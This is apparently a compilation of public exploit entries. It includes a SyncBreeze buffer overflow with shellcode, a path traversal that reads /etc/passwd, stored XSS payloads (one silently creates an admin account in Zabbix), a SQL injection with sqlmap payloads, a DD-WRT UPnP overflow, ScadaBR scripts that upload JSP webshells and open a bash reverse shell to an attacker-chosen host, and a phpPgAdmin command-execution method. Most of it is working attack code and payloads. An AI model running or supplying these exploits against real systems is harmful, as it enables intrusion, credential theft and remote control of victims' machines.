# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow # Date: 03/27/2021 # Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com # Vendor: https://www.syncbreeze.com/ # Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html # Version: SyncBreeze v10.1.16 x86 # Tested on: Windows 10 x64 (19042.867) # CVE: CVE-2017-15950 Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file. # -*- coding: utf-8 -*- import struct # badchars #\x00\x0a\x0d\x20\x27 #\x81\x82\x83\x84\x85\x86\x87\x88 #\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90 #\x91\x92\x93\x94\x95\x96\x97\x98 #\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0 #\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8 #\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0 #\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8 #\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0 #\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8 #\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0 #\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8 #\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0 #\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8 #\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0 #\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8 #\xF9\xFA\xFB\xFC\xFD\xFE\xFF # Shellcode payload size: 432 bytes # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python shellcode = b"" shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69" shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30" shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e" shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c" shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66" shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61" shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65" shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d" shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36" shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a" shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a" shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b" shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70" shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b" shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39" shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71" shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54" shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54" shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71" shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c" shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68" shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50" shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31" shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f" shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44" shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31" shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33" shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f" shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78" shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55" shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63" shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70" shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74" shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f" shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43" shellcode += b"\x30\x41\x41" # padding to crash buffer basura = struct.pack('<L', 0x41414141) * 390 # gadgets to move payload pointer into EAX GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX # padding to reach buffer address stored in ebp basura2 = struct.pack('<L', 0x41414141) * 56 # padding for stack pivot padding = struct.pack('<L', 0x41414141) * 4 padding2 = struct.pack('<L', 0x41414141) * 20 # stack pivot to reach an area with more space for gadgets on the stack # 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret pivot = struct.pack('<L', 0x6506491c) # final payload fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode # write payload to xml file payload = open("xplSyncBreeze.xml", "wb") payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8')) payload.write("<sync name='".encode('utf-8')) payload.write(fruta) payload.write("'>\n</sync>\n".encode('utf-8')) payload.close()

# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download # Date: 27/03/2021 # Exploit Author: tuyiqiang # Vendor Homepage: https://xiongxyang.gitee.io/ # Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus # Version: all # Tested on: linux Vulnerable code: com/java2nb/common/controller/FileController.java @RequestMapping(value = "/download") public void fileDownload(String filePath,String fileName, HttpServletResponse resp) throws Exception { String realFilePath = jnConfig.getUploadPath() + filePath; InputStream in = new FileInputStream(realFilePath); fileName = URLEncoder.encode(fileName, "UTF-8"); resp.setHeader("Content-Disposition", "attachment;filename=" + fileName); resp.setContentLength(in.available()); OutputStream out = resp.getOutputStream(); byte[] b = new byte[1024]; int len = 0; while ((len = in.read(b)) != -1) { out.write(b, 0, len); } out.flush(); out.close(); in.close(); } Guide: 1. Log in to background management 2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd

# Exploit Title: Zabbix 3.4.7 - Stored XSS # Date: 30-03-2021 # Exploit Author: Radmil Gazizov # Vendor Homepage: https://www.zabbix.com/ # Software Link: https://www.zabbix.com/rn/rn3.4.7 # Version: 3.4.7 # Tested on: Linux # Reference - https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt 1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382) 2- Create new dashboard 3- Add a new widget => Type: Map nabigation tree 4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});"> 5- Click to "Add" button

# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting # Date: 3/30/2021 # Exploit Author: cmOs # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.9 # Tested on Ubuntu 20.04 Step 1: Log in to the dashboard using the Administrator account Step 2: Go to Listeners > Summary > Actions (View) > Edit Step 3: Inject XSS_Payload to "Notes" parameter Step 4: Graceful Restart Step 5: Trigger XSS when Administrator click on Default Icon [POC] POST /view/confMgr.php HTTP/1.1 Host: 127.0.0.1:7080 Connection: close Content-Length: 163 sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99" Accept: text/html, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://127.0.0.1:7080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://127.0.0.1:7080/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6; litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D; LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257

# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection # Date: 03/30/2021 # Exploit Author: cptsticky # Vendor Homepage: https://sourceforge.net/projects/latrix # Software Link: https://sourceforge.net/projects/latrix/files/latest/download # Version: 0.6.0 # Tested on: Ubuntu 20.04 POST /latrix/inandout.php HTTP/1.1 Host: 18.222.194.190 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 34 Origin: http://18.222.194.190 Connection: close Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1 Upgrade-Insecure-Requests: 1 txtaccesscode=111&btnsubmit=Submit Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode Output ----------------snip---------------- sqlmap resumed the following injection point(s) from stored session: --- Parameter: txtaccesscode (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit --- [16:29:27] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.6

# Exploit Title: CourseMS 2.1 - 'name' Stored XSS # Date: 03/30/2021 # Exploit Author: cptsticky # Vendor Homepage: http://sourceforge.net/projects/coursems # Software Link: https://sourceforge.net/projects/coursems/files/latest/download # Version: 2.1 # Tested on: Ubuntu 20.04 POST /coursems/admin/add_jobs.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 91 Origin: http://localhost Connection: close Referer: http://localhost/coursems/admin/add_jobs.php Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) Upgrade-Insecure-Requests: 1 name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS

# Exploit Title: DD-WRT 45723 - UPNP Buffer Overflow (PoC) # Date: 24.03.2021 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://dd-wrt.com/ # Software Link: https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/2021/ # Version: 45723 or prior # Tested on: TP-Link Archer C7 # https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/ import socket target_ip = "192.168.2.1" # IP Address of Target off = "D"*164 ret_addr = "AAAA" payload = off + ret_addr packet = \ 'M-SEARCH * HTTP/1.1\r\n' \ 'HOST:239.255.255.250:1900\r\n' \ 'ST:uuid:'+payload+'\r\n' \ 'MX:2\r\n' \ 'MAN:"ssdp:discover"\r\n' \ '\r\n' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) s.sendto(packet, (target_ip, 1900) )

# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2) # Date: 04/21 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.scadabr.com.br/ # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux # Tested on: Debian9,10~Ubuntu16.04 #!/usr/bin/python import requests,sys,time if len(sys.argv) <=6: print('[x] Missing arguments ... ') print('[>] Usage: python LinScada_RCE.py <TargetIp> <TargetPort> <User> <Password> <Reverse_IP> <Reverse_Port>') print('[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444') sys.exit(0) else: time.sleep(1) host = sys.argv[1] port = sys.argv[2] user = sys.argv[3] passw = sys.argv[4] rev_host = sys.argv[5] rev_port = sys.argv[6] flag = False LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ | _________ .___ ____________________ | | / _____/ ____ _____ __| _/____ \______ \______ \ | | \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | | / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | | /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | | \/ \/ \/ \/ \/ \/ \/ | | | | > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | | > Exploit Author : Fellipe Oliveira | | > Exploit for Linux Systems | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ ''' def main(): payload = { 'username': user, 'password': passw } print(banner) time.sleep(2) with requests.session() as s: s.post(LOGIN, data=payload) response = s.get(PROTECTED_PAGE) print "[+] Trying to authenticate "+LOGIN+"..." if response.status_code == 200: print "[+] Successfully authenticated! :D~\n" time.sleep(2) else: print "[x] Authentication failed :(" sys.exit(0) burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------32124376735876620811763441977", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_369755\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"webshell.jsp\"\r\nContent-Type: image/png\r\n\r\n <%@page import=\"java.lang.*\"%>\n<%@page import=\"java.util.*\"%>\n<%@page import=\"java.io.*\"%>\n<%@page import=\"java.net.*\"%>\n\n<%\nclass StreamConnector extends Thread {\n InputStream is;\n OutputStream os;\n StreamConnector(InputStream is, OutputStream os) {\n this.is = is;\n this.os = os;\n }\n public void run() {\n BufferedReader isr = null;\n BufferedWriter osw = null;\n try {\n isr = new BufferedReader(new InputStreamReader(is));\n osw = new BufferedWriter(new OutputStreamWriter(os));\n char buffer[] = new char[8192];\n int lenRead;\n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {\n osw.write(buffer, 0, lenRead);\n osw.flush();\n }\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n try {\n if (isr != null)\n isr.close();\n if (osw != null)\n osw.close();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n}\n%>\n\n<h1>Payload JSP to Reverse Shell</h1>\n<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>\n<form method=\"get\">\n\tIP Address<input type=\"text\" name=\"ipaddress\" size=30 value=\"127.0.0.1\"/>\n\tPort<input type=\"text\" name=\"port\" size=10 value=\"1234\"/>\n\t<input type=\"submit\" name=\"Connect\" value=\"Connect\"/>\n</form>\n\n<%\n String ipAddress = request.getParameter(\"ipaddress\");\n String ipPort = request.getParameter(\"port\");\n Socket sock = null;\n Process proc = null;\n if (ipAddress != null && ipPort != null) {\n try {\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\n System.out.println(\"socket created: \" + sock.toString());\n Runtime rt = Runtime.getRuntime();\n proc = rt.exec(\"/bin/bash\");\n System.out.println(\"process /bin/bash started: \" + proc.toString());\n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());\n System.out.println(\"outputConnector created: \" + outputConnector.toString());\n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());\n System.out.println(\"inputConnector created: \" + inputConnector.toString());\n outputConnector.start();\n inputConnector.start();\n } catch (Exception e) {\n System.out.println(\"exception: \" + e.getMessage());\n }\n }\n if (sock != null && proc != null) {\n out.println(\"<div class='separator'></div>\");\n out.println(\"<p>Process /bin/bash, running as (\" + proc.toString() + \", is connected to socket \" + sock.toString() + \".</p>\");\n }\n%>\n\n\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------32124376735876620811763441977\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------32124376735876620811763441977--\r\n" getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print('[>] Attempting to upload .jsp Webshell...') time.sleep(1) print('[>] Verifying shell upload...\n') time.sleep(2) if getdata.status_code == 200: print('[+] Upload Successfuly! \n') for num in range(1,1000): PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) find = s.get(PATH) if find.status_code == 200: print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) print('[>] Spawning Reverse Shell...\n') time.sleep(3) burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect" % (num,rev_host,rev_port) burp0_cookies = {"JSESSIONID": "8DF449C72D2F70704B8D997971B4A06B"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) time.sleep(5) if len(r.text) > 401: print('[+] Connection received') sys.exit(0) else: print('[x] Failed to receive reverse connection ...\n') elif num == 999: print('[x] Failed to found Webshell ... ') else: print('Reason:'+getdata.reason+' ') print('Exploit Failed x_x') if __name__ == '__main__': main()

# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1) # Date: 03/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://www.scadabr.com.br/ # Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux # Tested on: Windows7, Windows10 #!/usr/bin/python import requests,sys,time if len(sys.argv) <=4: print('[x] Missing arguments ... ') print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>') print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin') sys.exit(0) else: time.sleep(1) host = sys.argv[1] port = sys.argv[2] user = sys.argv[3] passw = sys.argv[4] flag = False LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm' PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm' banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ | _________ .___ ____________________ | | / _____/ ____ _____ __| _/____ \______ \______ \ | | \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ | | / \ \___ / __ \_/ /_/ | / __ \| | \| | \ | | /_______ /\___ >____ /\____ |(____ /______ /|____|_ / | | \/ \/ \/ \/ \/ \/ \/ | | | | > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload | | > Exploit Author : Fellipe Oliveira | | > Exploit for Windows Systems | +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+ ''' def main(): payload = { 'username': user, 'password': passw } print(banner) time.sleep(2) with requests.session() as s: s.post(LOGIN, data=payload) response = s.get(PROTECTED_PAGE) print("[+] Trying to authenticate "+LOGIN+"...") if response.status_code == 200: print("[+] Successfully authenticated! :D~\n") time.sleep(2) else: print("[x] Authentication failed :(") sys.exit(0) burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm" burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n<HTML><BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p;\n if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n }\n else{\n p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n }\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n }\n}\n%>\n</pre>\n</BODY></HTML>\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n" getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print('[>] Attempting to upload .jsp Webshell...') time.sleep(1) print('[>] Verifying shell upload...\n') time.sleep(2) if getdata.status_code == 200: print('[+] Upload Successfuly!') for num in range(1,500): PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num) find = s.get(PATH) if find.status_code == 200: print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)) flag = True print('[>] Spawning fake shell...') time.sleep(3) while flag: param = raw_input("# ") burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param) burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"} send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('<INPUT TYPE="text" NAME="cmd">', '').replace('<INPUT TYPE="submit" VALUE="Send">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '') print(clean) elif num == 499: print('[x] Webshell not Found') else: print('Reason:'+getdata.reason+' ') print('Exploit Failed x_x') if __name__ == '__main__': main()

# Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated) # Date: 29/03/2021 # Exploit Author: Valerio Severini # Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL_7-13-0 # Version: 7.13.0 or lower # Tested on: Debian 10 and Ubuntu Description: phpPgAdmin through 7.13.0 allows remote authenticated users to execute arbitrary code. An attacker can create a table named cmd_exec with one column, add type=text and cmd_out, and try to execute the query via a SQL tab. It will fail because of restrictions on statements. However, the attacker can bypass this step by uploading a .txt file (containing a SQL statement such as "COPY cmd_exec FROM PROGRAM" followed by OS commands) in the Browse bar. This achieves remote command execution via a "SELECT * FROM cmd_exec" statement. Attack Vectors (PoC): 1) you have to create a table manually and call it "cmd_exec" with 1 column 2) add cmd_output and type = text 3) try to execute the query via SQL tabs , but it should fail because of restriction of Statement. 4) A malicious Attacker could bypass this step uploading a .txt file in "Browse" bar, with a SQL malicious query inside, for example: " COPY cmd_exec FROM PROGRAM 'id; cd /root; ls'; " 5) The attacker could execute Remote command execution and obtain full access control executing in SQL query: " SELECT * FROM cmd_exec; "

Through this article, let’s take a look. How to hack other people’s desktop wallpapers. Experimental Environment kali Linux Windows Xiaomi Mobile (Android12) Module Introduction set_wallpaper This module is very simple because what it does is set the desktop wallpaper background on the specified session. When we run the module, upload the image on the attacker's computer to the victim's system and set it as the victim's wallpaper. Change Windows wallpaper Terminal in Kali and type msfconsole to load the Metasploit framework. After the target host obtains the shell, put the current session session information in the background. Then execute the following command use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root//1.jpg exploit this way to complete the modification of the Windows desktop background. Change wallpaper on Android First, get a meterpreter session on the Android system. Just like before, use the background command to place the current session in the background. Then use the set_wallpaper module. use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root/Desktop/1.jpeg exploit Effect Video Demo